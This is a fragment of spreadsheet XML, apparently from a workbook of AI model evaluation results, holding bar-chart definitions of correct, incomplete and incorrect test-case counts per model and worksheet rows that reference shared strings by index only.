                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>12</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>10</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>9</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>11</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>13</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>14</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B770-4845-8C21-E54751E13959}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:axId val="10"/>
        <c:axId val="100"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="10"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="r"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-PT"/>
                  <a:t>Total Score</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pt-PT"/>
                  <a:t>Model</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:numFmt formatCode="General" sourceLinked="1"/>
        <c:majorTickMark val="none"/>
        <c:minorTickMark val="none"/>
        <c:tickLblPos val="nextTo"/>
        <c:crossAx val="10"/>
        <c:crosses val="autoZero"/>
        <c:crossBetween val="between"/>
      </c:valAx>
    </c:plotArea>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pt-PT"/>
              <a:t>Evaluation Distribution by Model</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="1"/>
    </c:title>
    <c:autoTitleDeleted val="0"/>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="bar"/>
        <c:grouping val="stacked"/>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Correct</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="C6EFCE"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$K$2:$K$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>6</c:v>
                </c:pt>
                <c:pt idx="24">
                  <c:v>7</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C2FA-4BBD-B5F7-66FA6B9CA9E9}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Incomplete</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFEB9C"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$L$2:$L$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="23">
                  <c:v>1</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1-C2FA-4BBD-B5F7-66FA6B9CA9E9}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:ser>
          <c:idx val="2"/>
          <c:order val="2"/>
          <c:tx>
            <c:v>Incorrect</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FFC7CE"/>
            </a:solidFill>
            <a:ln>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:invertIfNegative val="1"/>
          <c:val>
            <c:numRef>
              <c:f>Summary!$M$2:$M$26</c:f>
              <c:numCache>
                <c:formatCode>General</c:formatCode>
                <c:ptCount val="25"/>
                <c:pt idx="0">
                  <c:v>7</c:v>
                </c:pt>
                <c:pt idx="1">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="2">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="3">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="4">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="5">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="6">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="7">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="8">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="9">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="10">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="11">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="12">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="13">
                  <c:v>2</c:v>
                </c:pt>
                <c:pt idx="14">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="15">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="16">
                  <c:v>1</c:v>
                </c:pt>
                <c:pt idx="17">
                  <c:v>5</c:v>
                </c:pt>
                <c:pt idx="18">
                  <c:v>4</c:v>
                </c:pt>
                <c:pt idx="19">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="20">
                  <c:v>0</c:v>
                </c:pt>
                <c:pt idx="21">
                  <c:v>3</c:v>
                </c:pt>
                <c:pt idx="22">
                  <c:v>1</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2-C2FA-4BBD-B5F7-66FA6B9CA9E9}"/>
            </c:ext>
          </c:extLst>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
        <c:gapWidth val="150"/>
        <c:overlap val="100"/>
        <c:axId val="10"/>
        <c:axId val="100"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="10"/>
        <c:scaling>
          <c:orientation val="minMax"/>
        </c:scaling>
        <c:delete val="1"/>
        <c:axPos val="r"/>
        <c:title>
          <c:tx>
            <c:rich>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="pt-PT"/>
                  <a:t>Number of Test Cases</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>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pt-PT"/>
                  <a:t>Model</a:t>
                </a:r>
              </a:p>
            </c:rich>
          </c:tx>
          <c:overlay val="1"/>
        </c:title>
        <c:numFmt formatCode="General"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400000" cy="36000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10</xdr:col>
      <xdr:colOff>0</xdr:colOff>
      <xdr:row>1</xdr:row>
      <xdr:rowOff>0</xdr:rowOff>
    </xdr:from>
    <xdr:ext cx="5400000" cy="36000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44" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>118</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="244.8" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>119</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>120</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>121</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>122</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="230.4" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>123</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="216" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>117</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>124</v>
      </c>
      <c r="G8" s="3"/>
    </row>
    <row r="9" spans="1:7" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A9" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B9" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C9" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D9" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E9" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F9" s="3" t="s">
        <v>126</v>
      </c>
      <c r="G9" s="3"/>
    </row>
    <row r="10" spans="1:7" ht="172.8" x14ac:dyDescent="0.3">
      <c r="A10" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B10" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C10" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D10" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E10" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F10" s="3" t="s">
        <v>127</v>
      </c>
      <c r="G10" s="3"/>
    </row>
    <row r="11" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A11" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B11" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C11" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D11" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E11" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F11" s="3" t="s">
        <v>128</v>
      </c>
      <c r="G11" s="3"/>
    </row>
    <row r="12" spans="1:7" ht="144" x14ac:dyDescent="0.3">
      <c r="A12" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B12" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C12" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D12" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E12" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F12" s="3" t="s">
        <v>129</v>
      </c>
      <c r="G12" s="3"/>
    </row>
    <row r="13" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A13" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B13" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C13" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D13" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E13" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F13" s="3" t="s">
        <v>130</v>
      </c>
      <c r="G13" s="3"/>
    </row>
    <row r="14" spans="1:7" ht="144" x14ac:dyDescent="0.3">
      <c r="A14" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B14" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C14" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D14" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E14" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F14" s="3" t="s">
        <v>131</v>
      </c>
      <c r="G14" s="3"/>
    </row>
    <row r="15" spans="1:7" ht="129.6" x14ac:dyDescent="0.3">
      <c r="A15" s="2" t="s">
        <v>125</v>
      </c>
      <c r="B15" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C15" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D15" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E15" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F15" s="3" t="s">
        <v>132</v>
      </c>
      <c r="G15" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C15">
    <cfRule type="cellIs" dxfId="23" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="22" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="21" priority="3" operator="equal">
      <formula>"Incorrect"</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133</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>134</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>135</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>136</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>137</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>138</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>139</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>133</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>140</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="20" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="19" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="18" priority="3" operator="equal">
      <formula>"Incorrect"</formula>
    </cfRule>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141</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>141</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>142</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="17" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="16" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="15" priority="3" operator="equal">
      <formula>"Incorrect"</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143</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>144</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>145</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="115.2" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>146</v>
      </c>
      <c r="G4" s="3"/>
    </row>
    <row r="5" spans="1:7" ht="86.4" x14ac:dyDescent="0.3">
      <c r="A5" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B5" s="2" t="s">
        <v>21</v>
      </c>
      <c r="C5" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D5" s="3" t="s">
        <v>22</v>
      </c>
      <c r="E5" s="3" t="s">
        <v>23</v>
      </c>
      <c r="F5" s="3" t="s">
        <v>147</v>
      </c>
      <c r="G5" s="3"/>
    </row>
    <row r="6" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A6" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B6" s="2" t="s">
        <v>25</v>
      </c>
      <c r="C6" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D6" s="3" t="s">
        <v>26</v>
      </c>
      <c r="E6" s="3" t="s">
        <v>27</v>
      </c>
      <c r="F6" s="3" t="s">
        <v>148</v>
      </c>
      <c r="G6" s="3"/>
    </row>
    <row r="7" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A7" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B7" s="2" t="s">
        <v>29</v>
      </c>
      <c r="C7" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D7" s="3" t="s">
        <v>30</v>
      </c>
      <c r="E7" s="3" t="s">
        <v>31</v>
      </c>
      <c r="F7" s="3" t="s">
        <v>149</v>
      </c>
      <c r="G7" s="3"/>
    </row>
    <row r="8" spans="1:7" ht="57.6" x14ac:dyDescent="0.3">
      <c r="A8" s="2" t="s">
        <v>143</v>
      </c>
      <c r="B8" s="2" t="s">
        <v>33</v>
      </c>
      <c r="C8" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D8" s="3" t="s">
        <v>34</v>
      </c>
      <c r="E8" s="3" t="s">
        <v>35</v>
      </c>
      <c r="F8" s="3" t="s">
        <v>150</v>
      </c>
      <c r="G8" s="3"/>
    </row>
  </sheetData>
  <conditionalFormatting sqref="C2:C8">
    <cfRule type="cellIs" dxfId="14" priority="1" operator="equal">
      <formula>"Correct"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="13" priority="2" operator="equal">
      <formula>"Incomplete"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="12" priority="3" operator="equal">
      <formula>"Incorrect"</formula>
    </cfRule>
  </conditionalFormatting>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86.4" x14ac:dyDescent="0.3">
      <c r="A2" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B2" s="2" t="s">
        <v>8</v>
      </c>
      <c r="C2" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D2" s="3" t="s">
        <v>10</v>
      </c>
      <c r="E2" s="3" t="s">
        <v>11</v>
      </c>
      <c r="F2" s="3" t="s">
        <v>152</v>
      </c>
      <c r="G2" s="3"/>
    </row>
    <row r="3" spans="1:7" ht="100.8" x14ac:dyDescent="0.3">
      <c r="A3" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B3" s="2" t="s">
        <v>13</v>
      </c>
      <c r="C3" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D3" s="3" t="s">
        <v>14</v>
      </c>
      <c r="E3" s="3" t="s">
        <v>15</v>
      </c>
      <c r="F3" s="3" t="s">
        <v>153</v>
      </c>
      <c r="G3" s="3"/>
    </row>
    <row r="4" spans="1:7" ht="72" x14ac:dyDescent="0.3">
      <c r="A4" s="2" t="s">
        <v>151</v>
      </c>
      <c r="B4" s="2" t="s">
        <v>17</v>
      </c>
      <c r="C4" s="2" t="s">
        <v>9</v>
      </c>
      <c r="D4" s="3" t="s">
        <v>18</v>
      </c>
      <c r="E4" s="3" t="s">
        <v>19</v>
      </c>
      <c r="F4" s="3" t="s">
        <v>154</v>
      </c>
